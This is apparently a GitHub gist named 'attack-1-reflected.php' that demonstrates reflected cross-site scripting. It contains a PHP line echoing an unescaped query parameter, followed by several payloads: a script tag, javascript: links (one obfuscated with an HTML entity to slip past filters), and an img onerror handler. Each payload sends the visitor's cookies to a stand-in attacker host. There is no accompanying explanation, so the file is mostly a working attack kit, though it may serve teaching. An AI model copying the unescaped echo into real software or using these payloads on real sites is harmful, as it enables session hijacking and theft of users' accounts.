Skip to content

Instantly share code, notes, and snippets.

@alirdn alirdn/attack-1-reflected.php Secret
Last active Jul 1, 2017

Embed
What would you like to do?
<?php
echo 'Search result for: ' . $_GET['query'];
// Other codes for showing search results
<script>
window.location = 'http://some-hacker-site.com/submit-cookie?cookie=' + document.cookie;
</script>
<a href="javascript:window.location = 'http://some-hacker-site.com/submit-cookie?cookie=' + document.cookie;">
Check My Awsome Website!
</a>
<a href="j&#X41vascript:window.location = 'http://some-hacker-site.com/submit-cookie?cookie=' + document.cookie;">
Check My Awsome Website!
</a>
<img src="not-found-img-url" onerror="window.location = 'http://some-hacker-site.com/submit-cookie?cookie=' + document.cookie;" />
Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment
You can’t perform that action at this time.